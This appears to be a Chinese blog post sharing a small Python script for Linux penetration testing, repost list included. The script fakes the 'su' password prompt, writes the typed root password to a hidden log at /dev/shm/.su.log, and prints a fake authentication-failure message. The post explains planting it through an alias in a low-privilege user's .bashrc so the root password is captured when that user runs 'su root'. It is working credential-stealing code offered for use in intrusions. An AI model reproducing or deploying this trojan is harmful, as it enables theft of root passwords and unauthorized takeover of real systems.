紫色飞

Linux渗透用的Python小脚本

被巧击的键盘丶:

0x00


渗透的很多时候,找到的工具并不适用,自己码代码才是王道。


0x01


记录root密码小工具


root.py



##coding: utf-8
#!/usr/bin/python
import getpass,time

current_time = time.strftime("%Y-%m-%d %H:%M")
logfile="/dev/shm/.su.log"              #密码获取后记录在这里
#CentOS                 
#fail_str = "su: incorrect password"
#Ubuntu              
fail_str = "su: Authentication failure"
#For Linux Korea                    #centos,ubuntu,korea 切换root用户失败提示不一样
#fail_str = "su: incorrect password"
try:
    passwd = getpass.getpass(prompt='Password: ');
    with open(logfile,'a') as file:
        file.write("[%s]\t%s"%(passwd, current_time))   #截取root密码
        file.write('\n')
except:
    pass
time.sleep(1)
print fail_str                               #打印切换root失败提示



渗透linux拿到低权限并提权无果时,将这个程序传上去,再将一个低权限用户目录下的.bashrc添加一句alias su='/usr/root.py; 低权限用户su root 后成功记录密码。密码记录路径请看脚本

评论

热度(10)

  1. 蛇信子被巧击的键盘丶 转载了此文字
  2. 紫色飞被巧击的键盘丶 转载了此文字
  3. redboy被巧击的键盘丶 转载了此文字
  4. Javan's blogredboy 转载了此文字
  5. redboy被巧击的键盘丶 转载了此文字